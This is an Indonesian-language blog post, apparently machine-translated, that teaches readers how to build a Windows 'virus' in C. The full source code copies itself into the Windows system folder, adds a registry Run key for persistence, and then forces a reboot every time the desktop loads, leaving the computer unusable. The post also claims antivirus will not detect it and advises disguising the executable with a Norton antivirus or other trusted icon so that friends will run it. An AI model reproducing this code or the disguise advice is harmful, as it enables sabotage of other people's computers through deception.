i
 
Rate This
Quantcast
Hari ini saya akan menunjukkan Anda bagaimana untuk membuat virus yang restart komputer setelah setiap startup.Artinya, setelah infeksi, komputer akan restart setiap kali sistem di-boot. Ini berarti bahwa komputer akan menjadi bisa dioperasi karena reboot secepat desktop dimuat.
Untuk ini, virus perlu doubleclicked hanya sekali dan sejak itu seterusnya akan membawa keluar sisa operasi. Dan satu hal lagi, tidak ada software antivirus mendeteksi’s ini sebagai virus karena saya telah dikodekan ini virus di C . Jadi jika Anda sudah familiar denganbahasa C maka terlalu mudah untuk memahami logika di balik coding.
Berikut ini adalah kode sumber. #include<stdio.h> #include<dos.h> #include<dir.h>int found,drive_no;char buff[128]; void findroot() { int done; struct ffblk ffblk; //File block structure done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive if(done==0) { done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not if(done==0) { found=1; //means that the system is already infected return; } drive_no=1; return; } done=findfirst(“D:\\windows\\system”,&ffblk,FA_DIREC); if(done==0) { done=findfirst(“D:\\windows\\system\\sysres.exe”,&ffblk,0); if (done==0) { found=1;return; } drive_no=2; return; } done=findfirst(“E:\\windows\\system”,&ffblk,FA_DIREC); if(done==0) { done=findfirst(“E:\\windows\\system\\sysres.exe”,&ffblk,0); if(done==0) { found=1; return; } drive_no=3; return; } done=findfirst(“F:\\windows\\system”,&ffblk,FA_DIREC); if(done==0) { done=findfirst(“F:\\windows\\system\\sysres.exe”,&ffblk,0); if(done==0) { found=1; return; } drive_no=4; return; } else exit(0); } void main() { FILE *self,*target; findroot(); if(found==0) //if the system is not already infected { self=fopen(_argv[0],”rb”); //The virus file open’s itself switch(drive_no) { case 1: target=fopen(“C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\ CurrentVersion\\Run \/v sres \/t REG_SZ \/d C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup break; case 2: target=fopen(“D:\\windows\\system\\sysres.exe”,”wb”); system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\ CurrentVersion\\Run \/v sres \/t REG_SZ \/d D:\\windows\\system\\sysres.exe”); break; case 3: target=fopen(“E:\\windows\\system\\sysres.exe”,”wb”); system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\ CurrentVersion\\Run \/v sres \/t REG_SZ \/d E:\\windows\\system\\sysres.exe”); break; case 4: target=fopen(“F:\\windows\\system\\sysres.exe”,”wb”); system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\ CurrentVersion\\Run \/v sres \/t REG_SZ \/d F:\\windows\\system\\sysres.exe”); break; default: exit(0); } while(fread(buff,1,1,self)>0) fwrite(buff,1,1,target); fcloseall(); } else system(“shutdown -r -t 0″); //if the system is already infected then just give a command to restart } Kompilasi Kode Scource Ke Virus eksekusi. 1. Download Kode Sumber Disini 2. File yang didownload akan Sysres.C 3. Untuk langkah-demi-langkah panduan kompilasi, lihat posting saya Bagaimana mengkompilasi C Program . Pengujian Dan Menghapus Virus ini Dari PC Anda
Anda dapat mengkompilasi dan tes ini virus pada PC Anda sendiri tanpa rasa takut. Untuk menguji, hanya DoubleClick yang sysres.exe file dan restart sistem secara manual.Sekarang dan seterusnya, ketika setiap kali PC boot dan desktop dimuat, PC Anda akan restart secara otomatis lagi dan lagi. Tidak akan ada salahnya selain dari secara otomatis me-restart sistem anda. Setelah pengujian, Anda dapat menghapus virus dengan langkah-langkah berikut.
1. Reboot komputer Anda di SAFE MODE 2. Goto
X: \ Windows \ System
X bisa menjadi C, D, E atau F)3.Anda akan menemukan file dengan nama sysres.exe , menghapusnya. 4.Type regedit di run ke. Anda akan goto registri editor.Here menavigasi
HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run
Di sana, di situs kanan anda akan melihat entri dengan nama “ SRES “it.You. entry.That ‘s ini Hapus telah menghapus Virus ini berhasil.Logika Dibalik Kerja Virus ini Jika saya tidak menjelaskan logika ( Algoritma ) balik kerja virus, posting ini akan tidak lengkap. Jadi saya akan menjelaskan logika dengan cara yang disederhanakan. Di sini saya tidak akan menjelaskan rincian teknis program. Jika Anda memiliki keraguan lebih lanjut silakan lewat komentar. LOGIC: 1. Pertama virus akan menemukan partisi root (Partisi di mana Windows diinstal). 2. Selanjutnya akan menentukan apakah file Virus sudah disalin (Sudah terinfeksi) ke X: \ Windows \ System 3. Jika tidak hanya akan menempatkan salinan dirinya ke dalam X: \ Windows \ Systemdan membuat entri registry untuk menempatkan file ini virus ke startup. 4. Atau jika virus tersebut sudah ditemukan di X: \ Windows \ System directory (folder), maka itu hanya memberikan perintah untuk restart komputer. Proses ini diulangi setiap kali PC di-restart.
CATATAN: Sistem tidak akan direstart segera setelah Anda klik ganda Sysres.exe file. sebuah proses restart akan terjadi dari boot berikutnya dari sistem.
DAN SATU HAL SEBELUM ANDA LEBIH CUTI (Langkah ini opsional)
Setelah anda mengkompilasi, yang Sysres.exe file yang Anda dapatkan akan memilikiikon default . Jadi, jika Anda mengirim file ini ke teman Anda mereka mungkin tidak klik di atasnya karena memiliki ICON default. Jadi adalah mungkin untuk mengubah ICON iniSysres.exe file ke dalam setiap ICON lain yang lebih dipercaya dan terlihat menarik.
Sebagai contoh Anda dapat mengubah . exe ‘s file icon ke Norton antivirus ICON itu sendiri sehingga orang-orang melihat file ini percaya bahwa itu adalah Norton antivirus .Atau Anda dapat mengubah’s ICON ke dalam ICON dari setiap dan terpercaya program populer sehingga orang pasti akan klik di atasnya. Rincian tutorial mengubah ICON diberikan dalam posting saya Cara Mengganti ICON Dari Sebuah File EXE .

By: Lombok_Creck84